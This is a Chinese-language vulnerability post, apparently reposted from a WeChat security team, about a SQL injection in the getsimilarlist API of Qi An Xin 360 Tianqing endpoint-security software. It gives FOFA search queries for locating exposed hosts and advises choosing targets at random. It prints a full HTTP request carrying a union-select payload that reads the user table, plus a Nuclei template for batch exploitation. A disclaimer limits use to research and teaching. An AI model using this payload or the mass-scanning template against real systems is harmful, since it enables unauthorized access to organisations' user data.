漏洞描述
奇安信360天擎getsimilarlist存在SQL注入漏洞。
漏洞复现
步骤一:在Fofa中搜索以下语法并随机确定要进行攻击测试的目标....
#FOFA搜索语法banner="QiAnXin web server" || banner="360 web server" || body="appid":"skylar6" || body="/task/index/detail?id={item.id}" || body="已过期或者未授权,购买请联系4008-136-360"
步骤二:启代理并打开BP对其首页进行抓包拦截....修改请求包内容,执行poc进行用户查询。
GET /api/client/getsimilarlist?status[0,1%29+union+all+select+%28%2F%2A%2150000select%2A%2F+79787337%29%2C+setting%2C+setting%2C+status%2C+name%2C+create_time+from+%22user%22+where+1+in+%281]=1&status[0]=1 HTTP/1.1Host: ipCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: close
批量脚本
id: qianxin-360-tianqing-getsimilarlist-sqli-rceinfo:name: qianxin-360-tianqing-getsimilarlist-sqli-rceauthor: xyseverity: hightags: qianxin,sqli,iotdescription: 奇安信360天擎getsimilarlist存在SQL注入漏洞metadata:fofa-query: banner="QiAnXin web server" || banner="360 web server" || body="appid":"skylar6" || body="/task/index/detail?id={item.id}" || body="已过期或者未授权,购买请联系4008-136-360"verified: truemax-request: 1http:- raw:- |GET /api/client/getsimilarlist?status[0,1%29+union+all+select+%28%2F%2A%2150000select%2A%2F+79787337%29%2C+setting%2C+setting%2C+status%2C+name%2C+create_time+from+%22user%22+where+1+in+%281]=1&status[0]=1 HTTP/1.1Host:User-Agent: Mozilla/5.0matchers-condition: andmatchers:- type: statusstatus:- 200- type: wordwords:- "list"- "total"- "reason":"success"part: bodycondition: and- type: wordpart: headerwords:- "application/json"
原文始发于微信公众号(揽月安全团队):奇安信360天擎getsimilarlistSQL注入漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论